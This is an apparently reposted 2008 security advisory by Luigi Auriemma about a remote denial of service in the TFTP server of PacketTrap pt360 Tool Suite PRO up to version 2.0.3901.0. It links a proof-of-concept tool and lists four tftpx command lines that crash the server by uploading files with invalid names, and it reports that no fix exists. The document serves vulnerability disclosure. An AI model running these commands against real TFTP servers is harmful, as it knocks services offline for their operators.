Denial of Service in PacketTrap TFTP server 2.0.3901.0

2008-03-11T00:00:00
ID SECURITYVULNS:DOC:19369
Type securityvulns
Reporter Securityvulns
Modified 2008-03-11T00:00:00

Description

                         Luigi Auriemma

Application: pt360 Tool Suite PRO http://www.packettrap.com/product/index.aspx Versions: <= 2.0.3901.0 Platforms: Windows Bug: Denial of Service of the TFTP server Exploitation: remote Date: 08 Mar 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org

1) Introduction 2) Bug 3) The Code 4) Fix

=============== 1) Introduction ===============

pt360 is a suite of network tools.

====== 2) Bug ======

The TFTP server implemented in the pt360 suite can be easily interrupted through the uploading of files with invalid names, in this case is raised an exception which blocks the TFTP component and forces the user to restart the whole application for re-running it.

=========== 3) The Code ===========

http://aluigi.org/testz/tftpx.zip

tftpx -u SERVER "\|" none tftpx -u SERVER "\"" none tftpx -u SERVER "<>" none tftpx -u -f SERVER 200 none

====== 4) Fix ======

No fix


Luigi Auriemma http://aluigi.org